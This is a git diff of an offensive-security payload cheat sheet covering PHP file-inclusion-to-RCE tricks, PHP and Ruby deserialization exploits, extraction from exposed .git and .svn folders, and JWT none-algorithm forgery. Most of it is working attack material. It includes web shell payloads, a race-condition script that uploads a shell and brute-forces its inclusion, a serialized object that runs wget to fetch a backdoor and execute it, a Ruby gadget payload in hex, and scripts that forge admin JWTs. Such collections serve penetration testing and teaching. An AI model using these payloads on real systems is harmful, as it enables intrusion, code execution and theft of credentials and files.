 Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : `http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+`
 ### Wrapper expect://
-```
+
-http://example.com/index.php?page=php:expect://id
+```powershell
-http://example.com/index.php?page=php:expect://ls
+http://example.com/index.php?page=expect://id
 http://example.com/index.php?page=expect://ls
 ```
 ### Wrapper input://
 Specify your payload in the POST parameters
-```
+
 ```powershell
 http://example.com/index.php?page=php://input
 POST DATA: <? system('id'); ?>
 ```
 ### Wrapper phar://
 Create a phar file with a serialized object in its meta-data.
 ```php
 // create new Phar
 $phar = new Phar('test.phar');
 $phar->startBuffering();
 $phar->addFromString('test.txt', 'text');
 $phar->setStub('<?php __HALT_COMPILER(); ? >');
 // add object of any class as meta data
 class AnyClass {}
 $object = new AnyClass;
 $object->data = 'rips';
 $phar->setMetadata($object);
 $phar->stopBuffering();
 ```
 If a file operation is now performed on our existing Phar file via the phar:// wrapper, then its serialized meta data is unserialized. If this application has a class named AnyClass and it has the magic method __destruct() or __wakeup() defined, then those methods are automatically invoked
 ```php
 class AnyClass {
    function __destruct() {
        echo $this->data;
    }
 }
 // output: rips
 include('phar://test.phar');
 ```
 NOTE: The unserialize is triggered for the phar:// wrapper in any file operation, `file_exists` and many more.
 ## LFI to RCE via /proc/*/fd
 1. Upload a lot of shells (for example : 100)
-2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD
+2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
 with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)
 ## LFI to RCE via /proc/self/environ
 Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file
-```
+
 ```powershell
 GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
 User-Agent: <?=phpinfo(); ?>
 ```
 ## LFI to RCE via upload
-If you can upload a file, just inject the shell payload in it (e.g : "<?php system($_GET['c']); ?>" ).
+
-```
+If you can upload a file, just inject the shell payload in it (e.g : `<?php system($_GET['c']); ?>` ).
 ```powershell
 http://example.com/index.php?page=path/to/uploaded/file.png
 ```
 In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf
 ## LFI to RCE via upload (race)
 Worlds Quitest Let's Play"
 * Upload a file and trigger a self-inclusion.
 * Repeat 1 a shitload of time to:
 * increase our odds of winning the race
 * increase our guessing odds
 * Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
 * Enjoy our shell.
 ```python
 import itertools
 import requests
 import sys
 print('[+] Trying to win the race')
 f = {'file': open('shell.php', 'rb')}
 for _ in range(4096 * 4096):
    requests.post('http://target.com/index.php?c=index.php', f)
 print('[+] Bruteforcing the inclusion')
 for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
    url = 'http://target.com/index.php?c=/tmp/php' + fname
    r = requests.get(url)
    if 'load average' in r.text:  # <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)
 print('[x] Something went wrong, please try again')
 ```
 ## LFI to RCE via phpinfo()
 https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf
 Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/downloads/publications/phpinfolfi.py)
 ## LFI to RCE via controlled log file
 Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.
-```
+
 ```powershell
 http://example.com/index.php?page=/var/log/apache/access.log
 http://example.com/index.php?page=/var/log/apache/error.log
 http://example.com/index.php?page=/var/log/vsftpd.log
@@ -183,31 +299,45 @@ http://example.com/index.php?page=/usr/local/apache2/log/error_log
 ```
 ## LFI to RCE via PHP sessions
 Check if the website use PHP Session (PHPSESSID)
-```
+
 ```javascript
 Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
 Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly
 ```
 In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] files
-```
+
 ```javascript
 /var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
 user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";
 ```
-Set the cookie to <?php system('cat /etc/passwd');?>
+
-```
+Set the cookie to `<?php system('cat /etc/passwd');?>`
 ```powershell
 login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php
 ```
 Use the LFI to include the PHP session file
-```
+
 ```powershell
 login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27
 ```
 ## Thanks to
 * [OWASP LFI](https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion)
 * [HighOn.coffee LFI Cheat](https://highon.coffee/blog/lfi-cheat-sheet/)
-* [Turning LFI to RFI ](https://l.avala.mp/?p=241)
+* [Turning LFI to RFI](https://l.avala.mp/?p=241)
 * [Is PHP vulnerable and under what conditions?](http://0x191unauthorized.blogspot.fr/2015/04/is-php-vulnerable-and-under-what.html)
 * [Upgrade from LFI to RCE via PHP Sessions](https://www.rcesecurity.com/2017/08/from-lfi-to-rce-via-php-sessions/)
 * [Local file inclusion tricks](http://devels-playground.blogspot.fr/2007/08/local-file-inclusion-tricks.html)
-* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
+* [CVV #1: Local File Inclusion - SI9INT](https://medium.com/bugbountywriteup/cvv-1-local-file-inclusion-ebc48e0e479a)
 * [Exploiting Blind File Reads / Path Traversal Vulnerabilities on Microsoft Windows Operating Systems - @evisneffos](http://www.soffensive.com/2018/06/exploiting-blind-file-reads-path.html)
 * [Baby^H Master PHP 2017 by @orangetw](https://github.com/orangetw/My-CTF-Web-Challenges#babyh-master-php-2017)
 * [Чтение файлов => unserialize !](https://rdot.org/forum/showthread.php?t=4379)
 * [New PHP Exploitation Technique - 14 Aug 2018 by Dr. Johannes Dahse](https://blog.ripstech.com/2018/new-php-exploitation-technique/)
 * [It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It, Sam Thomas](https://github.com/s-n-t/presentations/blob/master/us-18-Thomas-It's-A-PHP-Unserialization-Vulnerability-Jim-But-Not-As-We-Know-It.pdf)
 * [Local file inclusion mini list - Penetrate.io](https://penetrate.io/2014/09/25/local-file-inclusion-mini-list/)
--- a/Traversal/uploadlfi.py
+++ b/Traversal/uploadlfi.py
@@ -0,0 +1,20 @@
 import itertools
 import requests
 import string
 import sys
 print('[+] Trying to win the race')
 f = {'file': open('shell.php', 'rb')}
 for _ in range(4096 * 4096):
    requests.post('http://target.com/index.php?c=index.php', f)
 print('[+] Bruteforcing the inclusion')
 for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
    url = 'http://target.com/index.php?c=/tmp/php' + fname
    r = requests.get(url)
    if 'load average' in r.text:  # <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)
 print('[x] Something went wrong, please try again')
--- a/deserialization/Files/PHP-Serialization-RCE-Exploit.php
+++ b/deserialization/Files/PHP-Serialization-RCE-Exploit.php
--- a/deserialization/Files/Ruby_universal_gadget_generate_verify.rb
+++ b/deserialization/Files/Ruby_universal_gadget_generate_verify.rb
@@ -0,0 +1,66 @@
 #!/usr/bin/env ruby
 class Gem::StubSpecification
  def initialize; end
 end
 stub_specification = Gem::StubSpecification.new
 stub_specification.instance_variable_set(:@loaded_from, "|id 1>&2")
 puts "STEP n"
 stub_specification.name rescue nil
 puts
 class Gem::Source::SpecificFile
  def initialize; end
 end
 specific_file = Gem::Source::SpecificFile.new
 specific_file.instance_variable_set(:@spec, stub_specification)
 other_specific_file = Gem::Source::SpecificFile.new
 puts "STEP n-1"
 specific_file <=> other_specific_file rescue nil
 puts
 $dependency_list= Gem::DependencyList.new
 $dependency_list.instance_variable_set(:@specs, [specific_file, other_specific_file])
 puts "STEP n-2"
 $dependency_list.each{} rescue nil
 puts
 class Gem::Requirement
  def marshal_dump
    [$dependency_list]
  end
 end
 payload = Marshal.dump(Gem::Requirement.new)
 puts "STEP n-3"
 Marshal.load(payload) rescue nil
 puts
 puts "VALIDATION (in fresh ruby process):"
 IO.popen("ruby -e 'Marshal.load(STDIN.read) rescue nil'", "r+") do |pipe|
  pipe.print payload
  pipe.close_write
  puts pipe.gets
  puts
 end
 puts "Payload (hex):"
 puts payload.unpack('H*')[0]
 puts
 require "base64"
 puts "Payload (Base64 encoded):"
 puts Base64.encode64(payload)
--- a/Deserialization/README.md
+++ b/Deserialization/README.md
@@ -1,8 +1,17 @@
 # Java Deserialization
 ## Detection
 - "AC ED 00 05" in Hex
 - "rO0" in Base64
 - Content-type = "application/x-java-serialized-object"
 - "H4sIAAAAAAAAAJ" in gzip(base64)
 ## Exploit
 [ysoserial](https://github.com/frohoff/ysoserial) : A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
-```
+
 ```java
 java -jar ysoserial.jar CommonsCollections1 calc.exe > commonpayload.bin
 java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
 java -jar ysoserial-master-v0.0.4-g35bce8f-67.jar Groovy1 'ping 127.0.0.1' > payload.bin
@@ -42,6 +51,7 @@ URLDNS              |@gebl| | jre only vuln detect
 Wicket1             |@jacob-baines               |wicket-util:6.23.0, slf4j-api:1.6.4
 Additional tools (integration ysoserial with Burp Suite):
 - [JavaSerialKiller](https://github.com/NetSPI/JavaSerialKiller)
 - [Java Deserialization Scanner](https://github.com/federicodotta/Java-Deserialization-Scanner)
 - [Burp-ysoserial](https://github.com/summitt/burp-ysoserial)
@@ -51,7 +61,12 @@ Additional tools (integration ysoserial with Burp Suite):
 JRE8u20_RCE_Gadget
 [https://github.com/pwntester/JRE8u20_RCE_Gadget](https://github.com/pwntester/JRE8u20_RCE_Gadget)
 JexBoss - JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool, [https://github.com/joaomatosf/jexboss](https://github.com/joaomatosf/jexboss)
 ## Thanks to
- * [ysoserial](https://github.com/frohoff/ysoserial)
+
- * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
+- [Github - ysoserial](https://github.com/frohoff/ysoserial)
- * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
+- [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 - [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 - [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
 - [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
--- a/deserialization/PHP.md
+++ b/deserialization/PHP.md
@@ -0,0 +1,154 @@
 # PHP Object Injection
 PHP Object Injection is an application level vulnerability that could allow an attacker to perform different kinds of malicious attacks, such as Code Injection, SQL Injection, Path Traversal and Application Denial of Service, depending on the context. The vulnerability occurs when user-supplied input is not properly sanitized before being passed to the unserialize() PHP function. Since PHP allows object serialization, attackers could pass ad-hoc serialized strings to a vulnerable unserialize() call, resulting in an arbitrary PHP object(s) injection into the application scope.
 Also you should check the `Wrapper Phar://` in [File Inclusion - Path Traversal](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal#wrapper-phar) which use a PHP object injection.
 ## Exploit with the __wakeup in the unserialize function
 Vulnerable code:
 ```php
 <?php 
    class PHPObjectInjection{
        public $inject;
        function __construct(){
        }
        function __wakeup(){
            if(isset($this->inject)){
                eval($this->inject);
            }
        }
    }
    if(isset($_REQUEST['r'])){  
        $var1=unserialize($_REQUEST['r']);
        if(is_array($var1)){
            echo "<br/>".$var1[0]." - ".$var1[1];
        }
    }
    else{
        echo ""; # nothing happens here
    }
 ?>
 ```
 Payload:
 ```php
 # Basic serialized data
 a:2:{i:0;s:4:"XVWA";i:1;s:33:"Xtreme Vulnerable Web Application";}
 # Command execution
 string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";}"
 ```
 ## Authentication bypass
 ### Type juggling
 Vulnerable code:
 ```php
 <?php
 $data = unserialize($_COOKIE['auth']);
 if ($data['username'] == $adminName && $data['password'] == $adminPassword) {
    $admin = true;
 } else {
    $admin = false;
 }
 ```
 Payload:
 ```
 a:2:{s:8:"username";b:1;s:8:"password";b:1;}
 ```
 Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf)
 ### Object reference
 Vulnerable code:
 ```php
 <?php
 class Object
 {
  var $guess;
  var $secretCode;
 }
 $obj = unserialize($_GET['input']);
 if($obj) {
    $obj->secretCode = rand(500000,999999);
    if($obj->guess === $obj->secretCode) {
        echo "Win";
    }
 }
 ?>
 ```
 Payload:
 ```
 O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;}
 ```
 Ref: 
 - [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html)
 - [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web)
 ## Others exploits
 Reverse Shell
 ```php
 class PHPObjectInjection
 {
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('wget http://URL/backdoor.txt -O phpobjbackdoor.php && php phpobjbackdoor.php');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 ```
 Basic detection
 ```php
 class PHPObjectInjection
 {
    // CHANGE URL/FILENAME TO MATCH YOUR SETUP
    public $inject = "system('cat /etc/passwd');";
 }
 echo urlencode(serialize(new PHPObjectInjection));
 //O%3A18%3A%22PHPObjectInjection%22%3A1%3A%7Bs%3A6%3A%22inject%22%3Bs%3A26%3A%22system%28%27cat+%2Fetc%2Fpasswd%27%29%3B%22%3B%7D
 //'O:18:"PHPObjectInjection":1:{s:6:"inject";s:26:"system(\'cat+/etc/passwd\');";}'
 ```
 ## Finding and using gadgets
 [PHPGGC](https://github.com/ambionics/phpggc) is a tool built to generate the payload based on several frameworks:
 - Laravel
 - Symfony
 - SwiftMailer
 - Monolog
 - SlimPHP
 - Doctrine
 - Guzzle
 ```powershell
 phpggc monolog/rce1 'phpinfo();' -s
 ```
 ## Thanks to
 - [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 - [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
 - [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
 - [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
--- a/deserialization/README.md
+++ b/deserialization/README.md
@@ -0,0 +1,22 @@
 # Insecure Deserialization
 > Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them to storage, or to send as part of communications. Deserialization is the reverse of that process -- taking data structured from some format, and rebuilding it into an object - OWASP
 Check the following sub-sections, located in other files :
 * [Java deserialization : ysoserial, ...](Java.md)
 * [PHP (Object injection) : phpggc, ...](PHP.md)
 * [Ruby : universal rce gadget, ...](Ruby.md)
 ## Thanks to
 * [Github - ysoserial](https://github.com/frohoff/ysoserial)
 * [Java-Deserialization-Cheat-Sheet - GrrrDog](https://github.com/GrrrDog/Java-Deserialization-Cheat-Sheet/blob/master/README.md)
 * [Understanding & practicing java deserialization exploits](https://diablohorn.com/2017/09/09/understanding-practicing-java-deserialization-exploits/)
 * [How i found a 1500$ worth Deserialization vulnerability - @D0rkerDevil](https://medium.com/@D0rkerDevil/how-i-found-a-1500-worth-deserialization-vulnerability-9ce753416e0a)
 * [Misconfigured JSF ViewStates can lead to severe RCE vulnerabilities - 14 Aug 2017, Peter Stöckli](https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html)
 * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection)
 * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/)
 * [PHP unserialize](http://php.net/manual/en/function.unserialize.php)
 * [PHP Generic Gadget - ambionics security](https://www.ambionics.io/blog/php-generic-gadget-chains)
 * [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
--- a/deserialization/Ruby.md
+++ b/deserialization/Ruby.md
@@ -0,0 +1,12 @@
 # Ruby Deserialization
 Script to generate and verify the deserialization gadget chain against Ruby 2.0 through to 2.5
 ```ruby
 for i in {0..5}; do docker run -it ruby:2.${i} ruby -e 'Marshal.load(["0408553a1547656d3a3a526571756972656d656e745b066f3a1847656d3a3a446570656e64656e63794c697374073a0b4073706563735b076f3a1e47656d3a3a536f757263653a3a537065636966696346696c65063a0a40737065636f3a1b47656d3a3a5374756253706563696669636174696f6e083a11406c6f616465645f66726f6d49220d7c696420313e2632063a0645543a0a4064617461303b09306f3b08003a1140646576656c6f706d656e7446"].pack("H*")) rescue nil'; done
 ```
 ## Thanks
 - [RUBY 2.X UNIVERSAL RCE DESERIALIZATION GADGET CHAIN - elttam, Luke Jahnke](https://www.elttam.com.au/blog/ruby-deserialization/)
 - [Online access to Ruby 2.x Universal RCE Deserialization Gadget Chain - PentesterLab](https://pentesterlab.com/exercises/ruby_ugadget/online)
--- a/management/README.md
+++ b/management/README.md
@@ -0,0 +1,108 @@
 # Insecured source code management
 ## GIT - Source code management
 ### Github example with a .git
 1. Check 403 error (Forbidden) for .git or even better : directory listing
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
    ```powershell
    0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
    15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
    26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
    6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
    ```
 3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
    ```powershell
    # create a .git directory
    git init test
    cd test/.git
    # download the file
    wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
    mkdir .git/object/26
    mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
    # display the content of the file
    git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
        tree 323240a3983045cdc0dec2e88c1358e7998f2e39
        parent 15ca375e54f056a576905b41a417b413c57df6eb
        author Michael <michael@easyctf.com> 1489390329 +0000
        committer Michael <michael@easyctf.com> 1489390329 +0000
        Initial.
    ```
 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
    mkdir .git/object/32
    mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
    git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
        040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
        100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
        040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
        100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
        040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
    ```
 5. Read the data (flag.txt)
    ```powershell
    wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
    mkdir .git/object/cb
    mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
    git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
    ```
 ### Automatic way : diggit.py
 ```powershell
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
 -u is remote path, where .git folder exists
 -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
 -o is a hash of particular Git object to download
 ```
 ### Alternative way : rip-git
 ```powershell
 perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"
 git cat-file -p 07603070376d63d911f608120eb4b5489b507692  
 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 parent 15ca375e54f056a576905b41a417b413c57df6eb
 author Michael <michael@easyctf.com> 1489389105 +0000
 committer Michael <michael@easyctf.com> 1489389105 +0000
 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 ```
 ## SVN - Source code management
 ### SVN example (Wordpress)
 ```powershell
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 ```
 1. Download the svn database from http://server/path_to_vulnerable_site/.svn/wc.db
    ```powershell
    INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
    ```
 2. Download interesting files
    * remove \$sha1\$ prefix
    * add .svn-base postfix
    * use first two signs from hash as folder name inside pristine/ directory (94 in this case)
    * create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
 ### Automatic way
 ```powershell
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url "url with .svn available"
 ```
 ## Thanks to
 * bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks
 * bl4de, https://github.com/bl4de/security-tools/tree/master/diggit
--- a/management/README.md
+++ b/management/README.md
@@ -1,111 +0,0 @@
 # GIT - Source management
 ## Github example with a .git
 1. Check 403 error (Forbidden) for .git or even better : directory listing
 2. Git saves all informations in log file .git/logs/HEAD (try 'head' too)
 ```
 0000000000000000000000000000000000000000 15ca375e54f056a576905b41a417b413c57df6eb root <root@dfc2eabdf236.(none)> 1455532500 +0000        clone: from https://github.com/fermayo/hello-world-lamp.git
 15ca375e54f056a576905b41a417b413c57df6eb 26e35470d38c4d6815bc4426a862d5399f04865c Michael <michael@easyctf.com> 1489390329 +0000        commit: Initial.
 26e35470d38c4d6815bc4426a862d5399f04865c 6b4131bb3b84e9446218359414d636bda782d097 Michael <michael@easyctf.com> 1489390330 +0000        commit: Whoops! Remove flag.
 6b4131bb3b84e9446218359414d636bda782d097 a48ee6d6ca840b9130fbaa73bbf55e9e730e4cfd Michael <michael@easyctf.com> 1489390332 +0000        commit: Prevent directory listing.
 ```
 3. Access to the commit based on the hash -> a directory name (first two signs from hash) and filename (rest of it).git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c,
 ```
 # create a .git directory
 git init test
 cd test/.git
 # download the file
 wget http://xxx.web.xxx.com/.git/objects/26/e35470d38c4d6815bc4426a862d5399f04865c
 mkdir .git/object/26
 mv e35470d38c4d6815bc4426a862d5399f04865c .git/objects/26/
 # display the content of the file
 git cat-file -p 26e35470d38c4d6815bc4426a862d5399f04865c
 	tree 323240a3983045cdc0dec2e88c1358e7998f2e39
 	parent 15ca375e54f056a576905b41a417b413c57df6eb
 	author Michael <michael@easyctf.com> 1489390329 +0000
 	committer Michael <michael@easyctf.com> 1489390329 +0000
 	Initial.
 ```
 4. Access the tree 323240a3983045cdc0dec2e88c1358e7998f2e39
 ```
 wget http://xxx.web.xxx.com/.git/objects/32/3240a3983045cdc0dec2e88c1358e7998f2e39
 mkdir .git/object/32
 mv 3240a3983045cdc0dec2e88c1358e7998f2e39 .git/objects/32/
 git cat-file -p 323240a3983045cdc0dec2e88c1358e7998f2e39
 	040000 tree bd083286051cd869ee6485a3046b9935fbd127c0        css
 	100644 blob cb6139863967a752f3402b3975e97a84d152fd8f        flag.txt
 	040000 tree 14032aabd85b43a058cfc7025dd4fa9dd325ea97        fonts
 	100644 blob a7f8a24096d81887483b5f0fa21251a7eefd0db1        index.html
 	040000 tree 5df8b56e2ffd07b050d6b6913c72aec44c8f39d8        js
 ```
 5. Read the data (flag.txt)
 ```
 wget http://xxx.web.xxx.com/.git/objects/cb/6139863967a752f3402b3975e97a84d152fd8f
 mkdir .git/object/cb
 mv 6139863967a752f3402b3975e97a84d152fd8f .git/objects/32/
 git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
 ```
 ## Automatic way : diggit.py
 ```
 ./diggit.py -u remote_git_repo -t temp_folder -o object_hash [-r=True]
 ./diggit.py -u http://webpage.com -t /path/to/temp/folder/ -o d60fbeed6db32865a1f01bb9e485755f085f51c1
 -u is remote path, where .git folder exists
 -t is path to local folder with dummy Git repository and where blob content (files) are saved with their real names (cd /path/to/temp/folder && git init)
 -o is a hash of particular Git object to download
 ```
 ## Alternative way : rip-git
 ```
 perl rip-git.pl -v -u "http://edge1.web.*****.com/.git/"   
 git cat-file -p 07603070376d63d911f608120eb4b5489b507692  
 tree 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 parent 15ca375e54f056a576905b41a417b413c57df6eb
 author Michael <michael@easyctf.com> 1489389105 +0000
 committer Michael <michael@easyctf.com> 1489389105 +0000
 git cat-file -p 5dae937a49acc7c2668f5bcde2a9fd07fc382fe2
 ```
 # SVN - Source management
 ## SVN example (Wordpress)
 ```
 curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
 ```
 1. Download the svn database
 http://server/path_to_vulnerable_site/.svn/wc.db
 ```
 INSERT INTO "NODES" VALUES(1,'trunk/test.txt',0,'trunk',1,'trunk/test.txt',2,'normal',NULL,NULL,'file',X'2829',NULL,'$sha1$945a60e68acc693fcb74abadb588aac1a9135f62',NULL,2,1456056344886288,'bl4de',38,1456056261000000,NULL,NULL);
 ```
 2. Download interesting files
 remove \$sha1\$ prefix
 add .svn-base postfix
 use first two signs from hash as folder name inside pristine/ directory (94 in this case)
 create complete path, which will be: http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base
 ## Automatic way -
 ```
 git clone https://github.com/anantshri/svn-extractor.git
 python svn-extractor.py –url “url with .svn available”
 ```
 ## Thanks to
 * bl4de, https://github.com/bl4de/research/tree/master/hidden_directories_leaks
 * bl4de, https://github.com/bl4de/security-tools/tree/master/diggit
--- a/Token/README.md
+++ b/Token/README.md
@@ -0,0 +1,141 @@
 # JWT - JSON Web Token
 > JSON Web Token (JWT) is an open standard (RFC 7519) that defines a compact and self-contained way for securely transmitting information between parties as a JSON object. This information can be verified and trusted because it is digitally signed.
 ## JWT Format
 JSON Web Token : `Base64(Header).Base64(Data).Base64(Signature)`
 Example : `eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkFtYXppbmcgSGF4eDByIiwiZXhwIjoiMTQ2NjI3MDcyMiIsImFkbWluIjp0cnVlfQ.UL9Pz5HbaMdZCV9cS9OcpccjrlkcmLovL2A2aiKiAOY`
 ### Header
 Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
 "RS256" is used for asymetric purposes (RSA asymmetric encryption and private key signature).
 ```json
 {
    "typ": "JWT",
    "alg": "HS256"
 }
 ```
 ### Payload
 ```json
 {
    "sub":"1234567890",
    "name":"Amazing Haxx0r",
    "exp":"1466270722",
    "admin":true
 }
 ```
 JWT Encoder – Decoder: `http://jsonwebtoken.io`
 ## JWT Signature - None algorithm
 JWT supports a None algorithm for signature. This was probably introduced to debug applications. However, this can have a severe impact on the security of the application.
 To exploit this vulnerability, you just need to decode the JWT and change the algorithm used for the signature. Then you can submit your new JWT.
 However, this won't work unless you **remove** the signature
 The following code is a basic test for a None algorithm.
 ```python
 import jwt
 import base64
 def b64urlencode(data):
    return base64.b64encode(data).replace('+', '-').replace('/', '_').replace('=', '')
 print b64urlencode("{\"typ\":\"JWT\",\"alg\":\"none\"}") + \
    '.' + b64urlencode("{\"data\":\"test\"}") + '.'
 ```
 Alternatively you can modify an existing JWT (be careful with the expiration time)
 ```python
 #!/usr/bin/python
 # -*- coding: utf-8 -*-
 jwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXUyJ9.eyJsb2dpbiI6InRlc3QiLCJpYXQiOiIxNTA3NzU1NTcwIn0.YWUyMGU4YTI2ZGEyZTQ1MzYzOWRkMjI5YzIyZmZhZWM0NmRlMWVhNTM3NTQwYWY2MGU5ZGMwNjBmMmU1ODQ3OQ"
 header, payload, signature  = jwt.split('.')
 # Replacing the ALGO and the payload username
 header  = header.decode('base64').replace('HS256',"none")
 payload = (payload+"==").decode('base64').replace('test','admin')
 header  = header.encode('base64').strip().replace("=","")
 payload = payload.encode('base64').strip().replace("=","")
 # 'The algorithm 'none' is not supported'
 print( header+"."+payload+".")
 ```
 ## JWT Signature - RS256 to HS256
